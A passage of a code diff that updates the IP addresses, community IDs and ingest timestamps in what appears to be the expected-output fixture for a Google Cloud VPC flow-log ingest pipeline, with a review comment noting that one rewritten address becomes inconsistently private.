"ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -3684,7 +3684,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:jUDducT3iKEBK6mG6FO1bbR/lzQ=", + "community_id": "1:6nRZDTz3kwMjD/sK6/2SvfZM7Ks=", "bytes": 30233, "name": "default", "transport": "tcp", @@ -3707,7 +3707,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { 
@@ -3743,8 +3743,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868543800Z", - "original": "{\"insertId\":\"1ulp77rfdvho5t\",\"jsonPayload\":{\"bytes_sent\":\"30233\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33524,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.461087350Z\",\"packets_sent\":\"37\",\"reporter\":\"SRC\",\"rtt_msec\":\"0\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:24.790136141Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391353Z", + "original": 
"{\"insertId\":\"1ulp77rfdvho5t\",\"jsonPayload\":{\"bytes_sent\":\"30233\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33524,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.461087350Z\",\"packets_sent\":\"37\",\"reporter\":\"SRC\",\"rtt_msec\":\"0\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:24.790136141Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:24.790136141Z", "end": "2019-06-14T03:49:56.461087350Z", @@ -3771,18 +3771,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 160693, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 237 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:jiDRQHDBdyhzib4qfhhB5Y0obik=", + "community_id": "1:if1o1IHC+FQXkxdlwDLZoOhwlFs=", "bytes": 160693, "name": "default", "transport": "tcp", @@ -3804,7 +3804,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, 
@@ -3841,8 +3841,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868547100Z", - "original": "{\"insertId\":\"1ulp77rfdvho50\",\"jsonPayload\":{\"bytes_sent\":\"160693\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33548,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565451051Z\",\"packets_sent\":\"237\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.147072949Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391357100Z", + "original": 
"{\"insertId\":\"1ulp77rfdvho50\",\"jsonPayload\":{\"bytes_sent\":\"160693\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33548,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565451051Z\",\"packets_sent\":\"237\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.147072949Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:05.147072949Z", "end": "2019-06-14T03:49:59.565451051Z", @@ -3869,18 +3869,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33694, "bytes": 59903, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 353 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:vLK9hCfMg91TvjmTPfnw8bfG514=", + "community_id": "1:YFlTqXDJr36riIZMLbrmKhw38gg=", "bytes": 59903, "name": "default", "transport": "tcp", @@ -3902,7 +3902,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, 
@@ -3939,8 +3939,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868550400Z", - "original": "{\"insertId\":\"1ulp77rfdvho63\",\"jsonPayload\":{\"bytes_sent\":\"59903\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33694},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565117754Z\",\"packets_sent\":\"353\",\"reporter\":\"DEST\",\"rtt_msec\":\"216\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.566551903Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391360500Z", + "original": 
"{\"insertId\":\"1ulp77rfdvho63\",\"jsonPayload\":{\"bytes_sent\":\"59903\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33694},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565117754Z\",\"packets_sent\":\"353\",\"reporter\":\"DEST\",\"rtt_msec\":\"216\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.566551903Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:05.566551903Z", "end": "2019-06-14T03:49:59.565117754Z", @@ -3961,9 +3961,9 @@ "as": { "number": 15169 }, - "address": "198.51.100.107", + "address": "67.43.156.14", "port": 33924, - "ip": "198.51.100.107" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -3977,7 +3977,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:ji6ZJhSkwxeKiorTmyrgBE0/o+c=", + "community_id": "1:zZLAweyUiKKYNJrw7Pxer9kCofQ=", "bytes": 1780, "transport": "tcp", "type": "ipv4", @@ -3992,7 +3992,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.107" + "67.43.156.14" ] }, "gcp": { 
@@ -4016,8 +4016,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868553600Z", - "original": "{\"insertId\":\"1ulp77rfdvho4r\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"198.51.100.107\",\"dest_port\":33924,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:46:20.745658276Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:46:20.634545217Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391364700Z", + "original": 
"{\"insertId\":\"1ulp77rfdvho4r\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":33924,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:46:20.745658276Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:46:20.634545217Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:46:20.634545217Z", "end": "2019-06-14T03:46:20.745658276Z", @@ -4040,9 +4040,9 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65271, - "ip": "203.0.113.58" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -4056,7 +4056,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:32epFp/pi9XGVYf8FMJ7jpc0AzI=", + "community_id": "1:qv0hIE4qzHUK+++IYF3H4yaOdYA=", "bytes": 129335, "transport": "tcp", "type": "ipv4", @@ -4071,7 +4071,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.58" + "67.43.156.13" ] }, "gcp": { 
@@ -4095,8 +4095,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868556900Z", - "original": "{\"insertId\":\"1ulp77rfdvho4i\",\"jsonPayload\":{\"bytes_sent\":\"129335\",\"connection\":{\"dest_ip\":\"203.0.113.58\",\"dest_port\":65271,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:55.318940798Z\",\"packets_sent\":\"605\",\"reporter\":\"SRC\",\"rtt_msec\":\"89\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.155378070Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391369300Z", + "original": 
"{\"insertId\":\"1ulp77rfdvho4i\",\"jsonPayload\":{\"bytes_sent\":\"129335\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65271,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:55.318940798Z\",\"packets_sent\":\"605\",\"reporter\":\"SRC\",\"rtt_msec\":\"89\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.155378070Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.155378070Z", "end": "2019-06-14T03:49:55.318940798Z", @@ -4123,17 +4123,17 @@ "as": { "number": 15169 }, - "address": "192.0.2.117", + "address": "192.168.2.117", "port": 33862, "bytes": 1464, - "ip": "192.0.2.117", + "ip": "192.168.2.117", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:PNZTJG/Xqm+YMqKIui8nRXoLovE=", + "community_id": "1:HWHsV+dz7l0NO6OLlewyD4wOVhc=", "bytes": 1464, "transport": "tcp", "type": "ipv4", @@ -4147,7 +4147,7 @@ }, "related": { "ip": [ - "192.0.2.117", + "192.168.2.117", "10.87.40.76" ] }, 
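Review bot: 192.0.2.117 is rewritten to 192.168.2.117 (and, in the hunks at 4456/4526 below, 192.0.2.177 to 192.168.2.177), which moves these peers from the documentation range into RFC 1918 private space while the event still describes them as external: the expected output pairs `"as": { "number": 15169 }` with the new private address, the original log's `src_location` carries ASN 15169 plus continent/country, and the first of these events has no `src_instance` at all. That is an internally inconsistent fixture — if the pipeline ever branches on private versus public addresses (for example when deciding whether to apply geo/ASN enrichment), this document would drive the private path while asserting external-looking output. Unlike the other replacements in this change, which stay public, a public address from the same range used elsewhere in this file would keep the fixture coherent. The enclosing document continues outside this hunk.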
@@ -4172,8 +4172,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868560300Z", - "original": "{\"insertId\":\"1ulp77rfdvho5v\",\"jsonPayload\":{\"bytes_sent\":\"1464\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.0.2.117\",\"src_port\":33862},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:46:11.779780615Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:46:11.655143526Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391374100Z", + "original": 
"{\"insertId\":\"1ulp77rfdvho5v\",\"jsonPayload\":{\"bytes_sent\":\"1464\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.168.2.117\",\"src_port\":33862},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:46:11.779780615Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:46:11.655143526Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:46:11.655143526Z", "end": "2019-06-14T03:46:11.779780615Z", @@ -4202,17 +4202,17 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65321, "bytes": 75477, - "ip": "203.0.113.58", + "ip": "67.43.156.13", "packets": 737 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:bN6NKWS7CM7qV5T0FRSxEVoL53I=", + "community_id": "1:CLTnKCsx3XAJV3yhtJSs+Vn6Xsc=", "bytes": 75477, "transport": "tcp", "type": "ipv4", @@ -4226,7 +4226,7 @@ }, "related": { "ip": [ - "203.0.113.58", + "67.43.156.13", "10.139.99.242" ] }, 
@@ -4251,8 +4251,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868563500Z", - "original": "{\"insertId\":\"1ulp77rfdvho5i\",\"jsonPayload\":{\"bytes_sent\":\"75477\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.58\",\"src_port\":65321},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.312105537Z\",\"packets_sent\":\"737\",\"reporter\":\"DEST\",\"rtt_msec\":\"219\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.843986502Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391379600Z", + "original": 
"{\"insertId\":\"1ulp77rfdvho5i\",\"jsonPayload\":{\"bytes_sent\":\"75477\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65321},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.312105537Z\",\"packets_sent\":\"737\",\"reporter\":\"DEST\",\"rtt_msec\":\"219\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.843986502Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.843986502Z", "end": "2019-06-14T03:49:56.312105537Z", @@ -4275,9 +4275,9 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65316, - "ip": "203.0.113.58" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -4291,7 +4291,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:inMMyMxBckhL35Xh3+nNKgSc4qA=", + "community_id": "1:dJhBeC2A7KY1uJpWS48QzGUUwxY=", "bytes": 102119, "transport": "tcp", "type": "ipv4", @@ -4306,7 +4306,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.58" + "67.43.156.13" ] }, "gcp": { 
@@ -4330,8 +4330,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868566700Z", - "original": "{\"insertId\":\"1ulp77rfdvho5c\",\"jsonPayload\":{\"bytes_sent\":\"102119\",\"connection\":{\"dest_ip\":\"203.0.113.58\",\"dest_port\":65316,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220838853Z\",\"packets_sent\":\"600\",\"reporter\":\"SRC\",\"rtt_msec\":\"86\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.565831992Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391385Z", + "original": 
"{\"insertId\":\"1ulp77rfdvho5c\",\"jsonPayload\":{\"bytes_sent\":\"102119\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65316,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220838853Z\",\"packets_sent\":\"600\",\"reporter\":\"SRC\",\"rtt_msec\":\"86\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.565831992Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.565831992Z", "end": "2019-06-14T03:49:56.220838853Z", @@ -4358,18 +4358,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.101", + "address": "67.43.156.13", "port": 49680, "bytes": 1541638, "domain": "siem-windows", - "ip": "203.0.113.101", + "ip": "67.43.156.13", "packets": 949 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:o9OoB7tVAGCzWrss+96PmO6N0FI=", + "community_id": "1:cHKWt/bhFFzMhXHYkr/P9HZG8V0=", "bytes": 1541638, "name": "windows-isolated", "transport": "tcp", @@ -4391,7 +4391,7 @@ }, "related": { "ip": [ - "203.0.113.101", + "67.43.156.13", "10.139.99.242" ] }, 
